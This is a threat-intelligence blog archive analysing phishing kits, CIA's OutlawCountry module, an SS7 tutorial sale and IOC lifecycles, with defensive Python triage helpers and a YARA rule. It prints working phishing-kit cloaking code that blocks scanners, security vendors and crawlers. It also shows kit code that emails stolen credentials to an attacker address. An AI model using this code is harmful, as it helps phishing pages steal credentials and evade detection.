xorl %eax, %eax

Archive for the ‘threat intelligence’ Category

Threat Intelligence: Phishing kits anti-detection


In past posts I described a few common techniques used by phishing kit authors to evade detection. These are becoming more and more common in popular phishing kits, so here I present a few very common techniques that I came across lately.

The first is the familiar anti-detection based on the client's details: originating IP address, user-agent string, reverse-DNS hostname or domain name, etc. I have seen phishing kit authors refer to these with the slang terms "antiboots" and "antibot". An example of such a file is shown below.

<?php
// Gate 1: reverse-DNS the visitor and hide the page from hosts whose name
// contains a security vendor, search engine, cloud provider or Tor exit.
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$blocked_words = array("above","google","softlayer","amazonaws","cyveillance","phishtank","dreamhost","netpilot","calyxinstitute","tor-exit",);
foreach($blocked_words as $word) {
    if (substr_count($hostname, $word) > 0) {
        header("HTTP/1.0 404 Not Found");
        die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
    }
}

// Gate 2: IP range blocklist. The entries are used as regular expressions with
// unescaped dots; as transcribed the list also contains an empty pattern "",
// which preg_match('//', ...) matches against any address.
$bannedIP = array("^66.102.*.*", "^38.100.*.*", "^64.71.*.*", "^206.207.*.*", "^207.70.*.*", "^209.19.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*",  "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*", "^128.242.*.*", "^72.14.192.*", "^208.65.144.*", "^74.125.*.*", "^209.85.128.*", "^216.239.32.*", "^74.125.*.*", "^207.126.144.*", "^173.194.*.*", "^64.233.160.*", "^72.14.192.*", "^66.102.*.*", "^64.18.*.*", "^194.52.68.*", "^194.72.238.*", "^62.116.207.*", "^212.50.193.*", "^69.65.*.*", "^50.7.*.*", "^131.212.*.*", "^46.116.*.* ", "^62.90.*.*", "^89.138.*.*", "^82.166.*.*", "^85.64.*.*", "^85.250.*.*", "^89.138.*.*", "^93.172.*.*", "^109.186.*.*", "^194.90.*.*", "^212.29.192.*", "^212.29.224.*", "^212.143.*.*", "^212.150.*.*", "^212.235.*.*", "^217.132.*.*", "^50.97.*.*", "^217.132.*.*", "^209.85.*.*", "^66.205.64.*", "^204.14.48.*", "^64.27.2.*", "^67.15.*.*", "^202.108.252.*", "^193.47.80.*", "^64.62.136.*", "^66.221.*.*", "^64.62.175.*", "^198.54.*.*", "^192.115.134.*", "^216.252.167.*", "^193.253.199.*", "^69.61.12.*", "^64.37.103.*", "^38.144.36.*", "^64.124.14.*", "^206.28.72.*", "^209.73.228.*", "^158.108.*.*", "^168.188.*.*", "^66.207.120.*", "^167.24.*.*", "^192.118.48.*", "^67.209.128.*", "^12.148.209.*", "^12.148.196.*", "^193.220.178.*", "", "^198.25.*.*", "^64.106.213.*");
if(in_array($_SERVER['REMOTE_ADDR'],$bannedIP)) {
     // literal comparison against the regex strings: never true in practice
     header('HTTP/1.0 404 Not Found');
} else {
     foreach($bannedIP as $ip) {
          if(preg_match('/' . $ip . '/',$_SERVER['REMOTE_ADDR'])){
               header('HTTP/1.0 404 Not Found');
               die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
          }
     }
}

The above means that, as an organization, you need some "clean" networks, not attributable to you, from which to run your phishing detection engines. This is not the only trick: another common technique employed by many phishing kit authors is to embed the static content of the target page inline, Base64-encoded, as shown below.

  <div class='dialog'>
  ... skipping ...

This means that a detection engine relying on callback images or on requests for the target's static content will very likely fail to detect these phishing pages. Additionally, I have identified numerous phishing kits that do not target credentials only but go after OAuth2 tokens too, so your detection has to cover that attack scenario as well. Finally, I have identified at least two separate phishing kits that deliver the page content AES-encrypted together with a JavaScript AES implementation that decrypts it during client-side execution; below is an excerpt of the server-side PHP AES code shipped with one of them.

<?php
ini_set('display_errors', '1');

/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  */
/*  AES implementation in PHP                                                                     */
/*    (c) Chris Veness 2005-2014 www.movable-type.co.uk/scripts                                   */
/*    Right of free use is granted for all commercial or non-commercial use under CC-BY licence.  */
/*    No warranty of any form is offered.                                                         */
/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  */

class Aes
{
    /**
     * AES Cipher function [§5.1]: encrypt 'input' with Rijndael algorithm
     *
     * @param input message as byte-array (16 bytes)
     * @param w     key schedule as 2D byte-array (Nr+1 x Nb bytes) -
     *              generated from the cipher key by keyExpansion()
     * @return      ciphertext as byte-array (16 bytes)
     */
    public static function cipher($input, $w)
    {
        /* body not reproduced in this excerpt */
    }
}
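Returning to the first technique, the client-filtering gate: before pointing a detection engine at a suspected phishing URL it helps to know whether the kit would serve that engine the fake 404. The Python below is an added example, my code and not part of any phishing kit or of the original post. It re-implements the three gates with the same semantics as the PHP above, using the hostname words and user-agent markers from the snippet and a subset of the quoted IP patterns; the visitor identities used to exercise it are constructed.

```python
import re

# Hostname fragments and user-agent markers taken from the kit code quoted
# above, plus a subset of its IP prefixes (the full list is much longer).
BLOCKED_HOST_WORDS = ["above", "google", "softlayer", "amazonaws", "cyveillance",
                      "phishtank", "dreamhost", "netpilot", "calyxinstitute", "tor-exit"]
BANNED_IP_PATTERNS = ["^66.102.*.*", "^38.100.*.*", "^64.71.*.*", "^107.170.*.*",
                      "^149.20.*.*", "^74.125.*.*", "^54.176.*.*", "^66.249.*.*",
                      "^209.85.*.*", "^50.97.*.*"]
UA_MARKERS = ["google", "msnbot", "Yahoo! Slurp", "YahooSeeker", "Googlebot",
              "bingbot", "crawler", "PycURL", "facebookexternalhit"]


def hostname_blocked(hostname: str) -> bool:
    """substr_count($hostname, $word) > 0: a plain, case-sensitive substring test."""
    return any(word in hostname for word in BLOCKED_HOST_WORDS)


def ip_blocked(ip: str) -> bool:
    """preg_match('/' . $pattern . '/', $ip). The dots are unescaped, so each
    pattern matches a little more than its literal prefix, and the trailing
    '.*.*' adds nothing. The kit's in_array() branch compares the literal
    pattern strings with the address and never fires, so only this loop counts."""
    return any(re.search(pat, ip) for pat in BANNED_IP_PATTERNS)


def ua_blocked(ua: str) -> bool:
    """Reproduces the PHP precedence of `a or b or ... or z !== false`: only the
    last strpos() is compared with false; the others are truthy only when the
    marker starts at an offset > 0, so a user-agent that *begins* with
    'crawler' is not blocked."""
    *head, last = UA_MARKERS
    return any(ua.find(m) > 0 for m in head) or ua.find(last) != -1


def would_be_cloaked(hostname: str, ip: str, ua: str) -> bool:
    """True when this kit would answer the visitor with the fake 404."""
    return hostname_blocked(hostname) or ip_blocked(ip) or ua_blocked(ua)


if __name__ == "__main__":
    # Constructed scanner identities, not real hosts.
    for ident in [("crawl-66-249-66-1.googlebot.com", "66.249.66.1", "Mozilla/5.0"),
                  ("host.example.net", "203.0.113.9", "Mozilla/5.0 (Windows NT 10.0) Firefox/58.0"),
                  ("host.example.net", "203.0.113.9", "crawler/1.0")]:
        print(ident, "->", "cloaked" if would_be_cloaked(*ident) else "served")
```

Run it with the hostname, egress address and user-agent your scanner actually presents; any True means the kit will hide the page from that identity, which is the practical argument for the "clean" networks mentioned above. The IP list as quoted also contains an empty string, and preg_match('//', ...) matches every address, which would 404 all visitors; the example leaves that entry out on the assumption that it is a transcription slip rather than kit behaviour.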

Phishing has remained the top intrusion method for the past couple of years. Make sure that you adapt and combat it effectively. I hope the above information is useful to some defenders.


Written by xorl

February 20, 2018 at 09:59

Threat Analysis: Marketplaces for verified social media accounts


Cyber-crime is a massive ecosystem in which social media plays a key role. One way to stop it is to disrupt its supply chain, and that is what this post is about. Most cyber-crime groups use verified social media accounts to operate below the radar while carrying out their illegal activities. Here are a few common reasons why cyber-criminals buy and use verified social media accounts.

  • Anonymously set up marketplaces on social media platforms like Facebook
  • Run so-called "blackhat SEO" and sell services (advertisements, likes, reviews, comments, etc.)
  • Distribute or promote fake news
  • Avoid bot detection for common automated operations (spam, C2, phishing, etc.)
  • Anonymously use the services offered by that social media platform

There was an excellent slide at HITB GSEC 2017 in the "Facebook – The Deep & Dark Web for Threat Actors in Asia" presentation by Fadli B. Sidek, explaining very nicely the benefits of those Facebook verified accounts to cyber-criminals. Here is that slide.

The above are quite clear indicators that this area of cyber-crime will keep on growing. Some will be developing verified social media accounts and others will be buying them for uses like the ones described.

This underground market has been expanding so rapidly that many threat actors are developing and selling malicious tooling known as "Turboer". This type of software abuses popular social media platforms to claim high-value account names and attach them to a verified account; the cyber-criminals then typically sell those verified accounts at much higher prices.

The reason I wrote this post is my opening remark: if we want to disrupt the supply chain of cyber-criminals, this is an area we need to target. As more and more cyber-criminals use verified social media accounts for malicious purposes, demand increases and the ecosystem keeps growing.

Written by xorl

December 19, 2017 at 20:54

Understanding CIA’s OutlawCountry


On 30 June 2017 WikiLeaks published the user manual of OutlawCountry, a malicious Linux Kernel Module (LKM) that has existed at least since June 2015. Let's see what it does.

OutlawCountry is an LKM for Linux kernel 2.6.32 (64-bit CentOS/Red Hat 6.x) that creates a hidden Netfilter table (according to the manual the hidden table has the hardcoded name "dpxvke8h18"), in which the operator of the malicious LKM can then install NAT rules. Below you can see how CIA's EDG (Engineering Development Group) intended this tool to be used.

The concept is that the operator covertly installs OutlawCountry on TARG_1 and uses it to re-route the traffic between WEST_2 and EAST_3, EAST_4 and EAST_5, either to eavesdrop on it or to redirect selected traffic to a CIA-controlled system. Below is an example from the manual in which all TCP traffic from a given source address to a given destination address on port 33 is redirected to another address on port 55 (the addresses themselves are missing from the quoted command).

 iptables -t dpxvke8h18 -A PREROUTING \
        -p tcp -s -d --dport 33 \
        -j DNAT --to-destination

Installation and removal of the module is done with the standard Linux module management commands (insmod, rmmod); "modprobe" does not work because the module is not listed in the "modules.dep" file. Checking whether a host is infected with this specific version of OutlawCountry is as simple as checking for the existence of the hidden table with a command like the following.

iptables -t dpxvke8h18 -L -nv

Also, just like ordinary iptables NAT rules, it requires IP forwarding to be enabled (/proc/sys/net/ipv4/ip_forward must be set to 1), and if the iptables service is restarted OutlawCountry goes into a "dormant" state: the module stays loaded but the hidden table is no longer present. To re-enable it, the operator has to remove and insert the kernel module again. Unfortunately, WikiLeaks did not release the source code of the tool, so, based purely on the documentation provided, you can use the following simple "CIA_OutlawCountry.yar" YARA rule I wrote to search for it on your Linux systems.

import "hash"

rule OutlawCountry
{
    meta:
        author = "Anastasios Pingios (xorl)"
        description = "CIA OutlawCountry v1.0 LKM signature"
        filename = "nf_table_6_64.ko"
        filename = "nf_table.ko"
        reference = "https://wikileaks.org/vault7/document/OutlawCountry_v1_0_User_Manual/OutlawCountry_v1_0_User_Manual.pdf"
        date = "02-12-2017"

    strings:
        $s1 = "dpxvke8h18" ascii

    condition:
        $s1 or
        (filesize < 10KB and
         hash.md5(0, filesize) == "2cb8954a3e683477aa5a084964d4665d")
}
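For hosts where you cannot deploy YARA, the Python below applies the same logic as the rule to module files on disk and wraps the live checks from this post (the hidden table, the loaded modules, ip_forward) into one triage function. It is an added example, my code and not part of the leak or of the rule above. The module names in SUSPECT_MODULE_NAMES are an assumption derived from the documented file names, and the lsmod output used to exercise the parser is constructed.

```python
import hashlib
import os
import subprocess

# Values from the OutlawCountry v1.0 manual as quoted in the post. The names
# lsmod would show are my assumption, derived from the documented file names
# nf_table_6_64.ko / nf_table.ko; a renamed module will not show up here.
HIDDEN_TABLE = "dpxvke8h18"
KNOWN_MD5 = "2cb8954a3e683477aa5a084964d4665d"
SUSPECT_MODULE_NAMES = ("nf_table", "nf_table_6_64")


def matches_outlawcountry(data: bytes) -> bool:
    """Same logic as the YARA rule: the hidden table name anywhere in the file,
    or a file under 10 KB whose MD5 equals the documented sample."""
    if HIDDEN_TABLE.encode() in data:
        return True
    return len(data) < 10 * 1024 and hashlib.md5(data).hexdigest() == KNOWN_MD5


def parse_lsmod(text: str) -> list:
    """Module names from `lsmod` output (first column, header line skipped)."""
    return [line.split()[0] for line in text.strip().splitlines()[1:] if line.strip()]


def suspicious_modules(names) -> list:
    return [n for n in names if n in SUSPECT_MODULE_NAMES]


def scan_tree(root: str) -> list:
    """Walk a module tree (e.g. /lib/modules) and return the .ko files that match."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.endswith(".ko"):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    if matches_outlawcountry(fh.read()):
                        hits.append(path)
    return hits


def _run(cmd):
    """Return (exit status, stdout); (None, "") when the binary is missing."""
    try:
        proc = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                              universal_newlines=True)
        return proc.returncode, proc.stdout
    except OSError:
        return None, ""


def live_check() -> dict:
    """The live checks from the post, run on this host (iptables needs root).
    A dormant OutlawCountry (after an iptables restart) keeps the module loaded
    but no longer exposes the table, so the lsmod result matters on its own."""
    table_rc, _ = _run(["iptables", "-t", HIDDEN_TABLE, "-L", "-n"])
    _, lsmod_out = _run(["lsmod"])
    try:
        with open("/proc/sys/net/ipv4/ip_forward") as fh:
            ip_forward = fh.read().strip() == "1"
    except OSError:
        ip_forward = None
    return {
        "hidden_table_present": table_rc == 0,   # clean hosts fail to initialize the table
        "suspect_modules": suspicious_modules(parse_lsmod(lsmod_out)),
        "ip_forward": ip_forward,
    }


if __name__ == "__main__":
    print(live_check())
    print(scan_tree("/lib/modules"))
```

Any hit from scan_tree(), a zero exit status for the iptables call, or a loaded module with one of the assumed names deserves a look; ip_forward being 1 on its own is normal on a router and only adds weight to the other findings.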

Written by xorl

December 2, 2017 at 18:45

Deeper look into an Adobe Acrobat phishing website


It all started with a tweet by Yves Agostini on 26 November 2017 reporting the discovery of an exposed (probably under construction) phishing website. Just like in "Deeper look in an AppleID Phising Campaign", I will do a basic investigation to see what we can learn in order to be better prepared for similar future campaigns. You can see the phishing website's landing page below.

The phishing website is hosted at mbiomedik[.]undip[.]ac[.]id, which belongs to Magister Biomedik Universitas Diponegoro (Master of Biomedical Science, Diponegoro University) in Indonesia. The website runs an outdated version of Joomla, which is probably what the threat actor used to compromise it. Under the "jkl" directory the threat actor uploaded and extracted the acrobat.zip archive (MD5: 2f248c06a1d93b2b31409e8644866c40, SHA-1: a75b167ab3323ddb97ff12b9bb6ad425a36beaf7).

Based on the timestamp we can assume that the initial upload was on 7 November 2017. The archive has exactly the same structure as the phishing website, which implies that the threat actor simply extracted the files and started using them without further modification. You can see the directory structure of the archive below.

        │   └───FILES

The files in the archive have timestamps ranging from 16 January 2014 to 30 October 2017. The oldest file is "robots.txt" and the most recent is "send.php", which is interesting because this is the file that holds the email address to which the stolen credentials are sent.


define("EMAIL", "rainingbow19@gmail.com");

It is worth noting that most files were modified in 2016, so this is probably an old phishing toolkit that has been updated. Another notable feature is the "blocker.php" file, which is included from the index page and runs a series of checks to avoid detection. The filtering is based on the client's reverse-DNS hostname, IP range and user-agent string. You can see the complete "blocker.php" code below.


<?php
// Gate 1: reverse-DNS hostname against a list of vendors, crawlers, hosters,
// Tor exits and the target brand itself.
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$blocked_words = array("above","google","softlayer","amazonaws","cyveillance","phishtank","dreamhost","netpilot","calyxinstitute","tor-exit", "paypal");
foreach($blocked_words as $word) {
    if (substr_count($hostname, $word) > 0) {
        header("HTTP/1.0 404 Not Found");
        die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
    }
}

// Gate 2: IP range blocklist used as regular expressions (dots unescaped).
// As transcribed the list also contains an empty pattern "", which
// preg_match('//', ...) matches against any address.
$bannedIP = array("^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*",  "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*", "^128.242.*.*", "^72.14.192.*", "^208.65.144.*", "^74.125.*.*", "^209.85.128.*", "^216.239.32.*", "^74.125.*.*", "^207.126.144.*", "^173.194.*.*", "^64.233.160.*", "^72.14.192.*", "^66.102.*.*", "^64.18.*.*", "^194.52.68.*", "^194.72.238.*", "^62.116.207.*", "^212.50.193.*", "^69.65.*.*", "^50.7.*.*", "^131.212.*.*", "^46.116.*.* ", "^62.90.*.*", "^89.138.*.*", "^82.166.*.*", "^85.64.*.*", "^85.250.*.*", "^89.138.*.*", "^93.172.*.*", "^109.186.*.*", "^194.90.*.*", "^212.29.192.*", "^212.29.224.*", "^212.143.*.*", "^212.150.*.*", "^212.235.*.*", "^217.132.*.*", "^50.97.*.*", "^217.132.*.*", "^209.85.*.*", "^66.205.64.*", "^204.14.48.*", "^64.27.2.*", "^67.15.*.*", "^202.108.252.*", "^193.47.80.*", "^64.62.136.*", "^66.221.*.*", "^64.62.175.*", "^198.54.*.*", "^192.115.134.*", "^216.252.167.*", "^193.253.199.*", "^69.61.12.*", "^64.37.103.*", "^38.144.36.*", "^64.124.14.*", "^206.28.72.*", "^209.73.228.*", "^158.108.*.*", "^168.188.*.*", "^66.207.120.*", "^167.24.*.*", "^192.118.48.*", "^67.209.128.*", "^12.148.209.*", "^12.148.196.*", "^193.220.178.*", "", "^198.25.*.*", "^64.106.213.*");
if(in_array($_SERVER['REMOTE_ADDR'],$bannedIP)) {
     // literal comparison against the regex strings: never true in practice
     header('HTTP/1.0 404 Not Found');
} else {
     foreach($bannedIP as $ip) {
          if(preg_match('/' . $ip . '/',$_SERVER['REMOTE_ADDR'])){
               header('HTTP/1.0 404 Not Found');
               die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
          }
     }
}

// Gate 3: user-agent markers. Note that `!==` binds tighter than `or`, so
// only the last strpos() is compared with false; the others count as a hit
// only when the marker appears at an offset greater than 0.
if(strpos($_SERVER['HTTP_USER_AGENT'], 'google') or
   strpos($_SERVER['HTTP_USER_AGENT'], 'msnbot') or
   strpos($_SERVER['HTTP_USER_AGENT'], 'Yahoo! Slurp') or
   strpos($_SERVER['HTTP_USER_AGENT'], 'YahooSeeker') or
   strpos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') or
   strpos($_SERVER['HTTP_USER_AGENT'], 'bingbot') or
   strpos($_SERVER['HTTP_USER_AGENT'], 'crawler') or
   strpos($_SERVER['HTTP_USER_AGENT'], 'PycURL') or
   strpos($_SERVER['HTTP_USER_AGENT'], 'facebookexternalhit') !== false) {
    header('HTTP/1.0 404 Not Found');
    exit;
}


When you visit the phishing page you will notice that the URL includes a "cmd-login" parameter followed by a hash. It is generated in "index.php" as shown below, so technically it is just an MD5 of the server's current time, i.e. a per-visit identifier with no cryptographic purpose (two visitors arriving within the same second even get the same value).

$random=md5(date("Y-m-d H:i:s"));

The "cmd-login=" parameter seems to be a fairly unique identifier for this phishing toolkit, but it is not the only one. Below is a snippet of the code that emails the stolen credentials to the threat actor. The exact same file was also uploaded to Reverse.it on 2 October 2017 from dcrq[.]ga/1/365[.]zip, which was a phishing page for Office 365.

$message = build_message($_REQUEST);


$message = $message . "IP of sender: " . $ip ." ," . $country ." ," . $countrycode ." ," . $region ." ," . $city;

$message = $message . PHP_EOL.PHP_EOL."------Th@ w@s yOur LOG : SeNt tO [$my_email]------".PHP_EOL."";

$message = stripslashes($message);

$subject = "1 NEW LOG (($page ) : ($country))";

$subject = stripslashes($subject);
header("Location: delete_file.htm?rand=13InboxLightaspxn.1774256418&fid.4.1252899642&fid=1&fav.1&rand.13InboxLight.aspxn");

It is worth noting that dcrq[.]ga/1/365[.]zip sits on a shared hosting server in Indonesia that has been used repeatedly for malware delivery and for hosting phishing websites. Below you can see the Office 365 phishing page from this website.

The PHP also references a Google Drive document which no longer exists.

$continue = "https://docs.google.com/a/e-mail.ua/file/d/0B3xRhEC_fLTHNzktb2NfR21oa2s/edit";

A Google search for this document returns only one result: a Finnish IT discussion forum with a thread from November 2013 titled "tunnusten kalastelua?" (translation: "credential phishing?"). There, user "ossij" explains that after entering credentials into the www[.]postecsa[.]com/finishfish.htm phishing page, the victim was redirected to this document. Based on the date, this is probably one of the very first cases of this phishing toolkit being used in the wild.

The toolkit contains various plugins, extensions and old code from open source software (jQuery 1.2.1, CSS Browser Selector 0.5.3, etc.). The result is modern anti-detection code (such as the "blocker.php" shown earlier) alongside direct references to the target's own resources, like the Adobe favicon in the snippet below.

<html hola_ext_inject="disabled" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">

<script type="text/javascript">
function delayer(){
    window.location = "https://adobe.com"
}
</script>
<meta charset="utf-8">
<title>PDF ONLINE</title>
<link rel="shortcut icon" type="image/x-icon" href="https://wwwimages2.adobe.com/include/img/favicon.ico">
<style type="text/css">

The phishing landing page itself, on the other hand, not only avoids referencing remote resources of the target company, it has all of its content hardcoded in the HTML as Base64-encoded images. Below is a sample of the landing page's content.

<div style="clear:both;"></div>
						<h2 style="color:#696767; font-family:verdana, arial; text-shadow: 0px 1px 1px #4d4d4d;">
QlsUA0BvoA0AaANAYNKcezQCbcP0rafE7f2aAbcsYlvPMIr5gP7dAEQYlu9Qj6wP7dAOS3/pe0eGp5uzQCkKU4aAzoA0AaANAGgDQBoA0AaANAf/2Q==" width="83"></h2><span style="position:relative; bottom:20px; color:#6c5a79; ">Sign in with your receiving email account to view document</span>							

The last HTML comment is another relatively unique artifact that we can use for a search. Doing so quickly shows that the exact same code (including that comment) has been used in more phishing attacks, some of them delivered through PDF documents with links to phishing websites. Below is a list of the different results I got from searching for the above comment.

The above screenshot is one of the PDF lure documents from the previously mentioned attacks. So, without going into more detail, here are some interesting lessons from this brief investigation of this particular Adobe-themed phishing attack.

  • Threat actor "OLDLEGEND 360" has almost certainly been developing, improving and selling this phishing toolkit since at least 2013.
  • These phishing attacks are delivered mostly via lure PDF documents.
  • The phishing websites are a mix of hosted services and compromised legitimate websites.
  • The phishing toolkit carries a lot of legacy code but also various modern anti-detection techniques.
  • The phishing toolkit responds with a 404 when the request comes from known security companies, search engines, popular VPS and cloud providers, Tor exits, or the targeted company.
  • The static content is hardcoded in the phishing landing page as Base64-encoded strings.
  • The goal of the threat actor is to collect valid credentials for Adobe and Microsoft services.
  • The collected credentials are emailed to the cyber-criminal at an address configured in the "send.php" file of the phishing toolkit.
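Several of the artifacts above are mechanical to extract once you have the kit archive, and doing it with a script makes the next kit from the same author faster to triage. The Python below is an added example, my code and not part of the toolkit or of this post. It pulls the drop address from the define("EMAIL", ...) line in send.php, records which of the kit's fingerprint strings are present (the "cmd-login" parameter, the "Th@ w@s yOur LOG" banner, the blocker word list, the delete_file.htm redirect) and hashes every inline Base64 image so the brand graphics can be matched by digest instead of by a remote URL the kit no longer loads. The SAMPLE_KIT dictionary is a constructed stand-in mirroring the quoted snippets, not the real archive contents.

```python
import base64
import hashlib
import re

# Fingerprints taken from the snippets quoted in the post; the regexes and the
# sample files below are mine.
KIT_MARKERS = {
    "cmd-login": "cmd-login",
    "log-banner": "Th@ w@s yOur LOG",
    "blocker": "calyxinstitute",
    "delete-redirect": "delete_file.htm?rand=13InboxLight",
}
EMAIL_DEFINE = re.compile(r'define\(\s*"EMAIL"\s*,\s*"([^"]+)"\s*\)')
EMAIL_ASSIGN = re.compile(r"\$my_email\s*=\s*[\"']([^\"']+)[\"']")
DATA_IMAGE = re.compile(r"data:image/(\w+);base64,([A-Za-z0-9+/=\s]+?)['\")]")


def exfil_addresses(php_source: str) -> list:
    """Drop addresses: this kit defines the recipient in send.php."""
    found = EMAIL_DEFINE.findall(php_source) + EMAIL_ASSIGN.findall(php_source)
    return sorted(set(found))


def embedded_images(html: str) -> list:
    """Decode each inline image and hash it, so a logo can be matched by digest
    across kits that never fetch it from the brand's servers."""
    out = []
    for mime, blob in DATA_IMAGE.findall(html):
        raw = base64.b64decode(re.sub(r"\s+", "", blob), validate=True)
        out.append({"type": mime, "size": len(raw),
                    "sha256": hashlib.sha256(raw).hexdigest()})
    return out


def triage(files: dict) -> dict:
    """files maps a path inside the extracted archive to its text content."""
    report = {"markers": set(), "emails": set(), "images": []}
    for path, text in files.items():
        for name, needle in KIT_MARKERS.items():
            if needle in text:
                report["markers"].add(name)
        if path.endswith(".php"):
            report["emails"].update(exfil_addresses(text))
        if path.endswith((".php", ".htm", ".html")):
            report["images"].extend(embedded_images(text))
    report["markers"] = sorted(report["markers"])
    report["emails"] = sorted(report["emails"])
    return report


# Constructed stand-in for the archive, shaped like the quoted snippets.
SAMPLE_KIT = {
    "send.php": 'define("EMAIL", "drop@example.invalid");\n'
                '$message = $message . PHP_EOL . "------Th@ w@s yOur LOG : SeNt tO [$my_email]------";\n',
    "index.php": '$random=md5(date("Y-m-d H:i:s"));\n'
                 'header("Location: login.php?cmd-login=$random");\n',
    "blocker.php": '$blocked_words = array("google","calyxinstitute","tor-exit");\n',
    "login.htm": '<img src="data:image/jpeg;base64,ZmFrZS1qcGVnLWJ5dGVz" width="83">\n',
}

if __name__ == "__main__":
    print(triage(SAMPLE_KIT))
```

To use it on a real kit, read every file from the extracted archive into the dictionary (ignore binary files or decode them with errors="ignore"); the image digests go into your own indicator store, and the drop address is the one IOC worth a takedown request.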

Written by xorl

November 30, 2017 at 00:37

Cyber-criminals and SS7 attacks


Last week the news was flooded with an SS7 attack demonstration in Canada, for example "Hackers only needed a phone number to track this MP's cellphone" by CBC News. SS7 attacks have been known for years, but this news article reminded me of something I came across in a recent investigation. It started with the following Pastebin post.

This SS7 offer by threat actor "elitehackingservice" (email address: "elitehackingservice@gmail.com") first appeared in late October 2017 and is still being advertised on various underground websites. The offer is $400 for four PDF documents that will guide an attacker through exploiting SS7 to track and intercept cell phones. You can see the complete advertisement below.

I have released the official SS7 Network Exploits PDF.
This guide will instruct you how to hack into the SS7 network 
and how to track cell phones to their locations and how you can
intercept them from their carriers location.
There are 4 PDF files.
1. What is SS7, how it works and current vulnerabilities
2. Entry points to the SS7 Network Protocol
3. How to hack the SS7 Network Protocol step by step instructions.
4. How to locate and intercept specific cell numbers step by step instructions.
The price is $400.
Link to buy and download is: https://satoshibox.com/x65q8owqgnxbr3n8e3s7zfdz

Contact me on: elitehackingservices@gmail.com

The threat actor chose SatoshiBox to sell this tutorial, a website widely used by cyber-criminals. Based on the description and the actual filenames on SatoshiBox we can deduce exactly what buyers get from this offer.

  • Attacking-SS7-instructions.pdf (1.40MB): How to hack the SS7 Network Protocol step by step instructions
  • What-is-ss7.pdf (6.39MB): Entry points to the SS7 Network Protocol
  • celllocationandtracking.pdf (1.46MB): How to locate and intercept specific cell numbers step by step instructions
  • signalssystemvulnerabilitiesaugust2017.pdf (488.78KB): What is SS7, how it works and current vulnerabilities

It is worth noting that the Bitcoin address of this threat actor's offer (3D8NZzzEkWtMiHwHyy4xw61FKmN23LvW54) has no recorded transactions as of this writing, but we don't know whether this collection was also being sold elsewhere. An interesting tactic employed by this threat actor to advertise the offer is commenting on popular video sharing websites under videos about hacking software, such as mobile phone keylogger and RAT (Remote Access Trojan) tutorials or advertisements. You can see two examples below. Note that in those cases threat actor "elitehackingservices" used the handle "Mr HappyCoder" instead.

It is crucial to note that I have no indication of the reliability or credibility of this threat actor. However, it might be something you want to investigate further if SS7 attacks are part of your organization's threat landscape.

Written by xorl

November 28, 2017 at 22:28

IOC Lifecycle & Enrichment


One issue in cyber-security today is outdated IOCs (Indicators of Compromise). For example, an IP address hosting a Command & Control server today could host a legitimate service tomorrow. This means there needs to be some sort of "IOC lifecycle". Below is the lifecycle I usually propose.

The above works for the majority of cases, but not for everything. Here is a brief explanation of the four stages of this IOC lifecycle.

  1. Malicious activity: Some sort of malicious activity is identified. This could be anything from a new malware campaign to a spear-phishing attack.
  2. IOC generation: Unique artifacts/identifiers of this specific attack are extracted, such as malware sample hashes, email addresses, IP addresses, domain names, etc.
  3. IOC use: The generated IOC is integrated into the organization's security solutions and actively used to detect whether the indicator is present.
  4. Archiving: After a defined expiration threshold the IOC is archived, so it remains searchable for investigations but carries a very low score compared to fresh IOCs when it comes to detection.

The above works for common workflows, but once we introduce a Cyber-Threat Intelligence (CTI) capability, context becomes as important as content. Seeing that an IP address was "bad" two years ago is not as useful as seeing that it hosted a ZeuS Command & Control server and is associated with an internal incident response case number. For this reason, the extended version of my proposed IOC lifecycle, adding the CTI capability, is the one you see below.

The only difference is that before the archiving stage, there is an enrichment stage. This stage ensures that the IOC includes as much context as possible in order to provide value to subsequent investigations.
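To make the stages concrete, here is the five-stage lifecycle as a small Python model. It is an added example, my code and not from the post: an IOC is generated with its source, refreshed by sightings while in use, enriched with the context a later investigation needs, archived once an assumed 90-day threshold passes without a sighting, and afterwards kept searchable with a low detection weight. The threshold, the field names and the indicator used to exercise it are assumptions.

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta

# Assumed expiration threshold after which an IOC with no new sighting is
# archived; in practice this is tuned per type (hashes age slower than IPs).
ACTIVE_TTL = timedelta(days=90)


def _ts(value: str) -> datetime:
    """Timestamps are ISO-8601 strings to keep the model self-contained."""
    return datetime.fromisoformat(value)


@dataclass
class IOC:
    value: str                  # e.g. an IP address, domain name or file hash
    ioc_type: str               # "ip", "domain", "md5", ...
    first_seen: str             # stage 2: when the indicator was generated
    source: str                 # campaign, feed or case it came from
    last_seen: str = ""
    state: str = "active"       # active -> (enriched) -> archived
    context: dict = field(default_factory=dict)

    def __post_init__(self):
        self.last_seen = self.last_seen or self.first_seen

    def refresh(self, seen_at: str):
        """Stage 3 (use): a fresh sighting keeps the IOC out of the archive."""
        if self.state != "archived" and _ts(seen_at) > _ts(self.last_seen):
            self.last_seen = seen_at

    def enrich(self, **facts):
        """Enrichment stage: attach the context later investigations need,
        e.g. malware family, role ("c2") and the IR case number."""
        self.context.update(facts)
        if self.state == "active":
            self.state = "enriched"

    def tick(self, now: str) -> str:
        """Stage 4 (archiving): once ACTIVE_TTL has passed since the last sighting."""
        if self.state != "archived" and _ts(now) - _ts(self.last_seen) >= ACTIVE_TTL:
            self.state = "archived"
        return self.state

    def detection_score(self) -> float:
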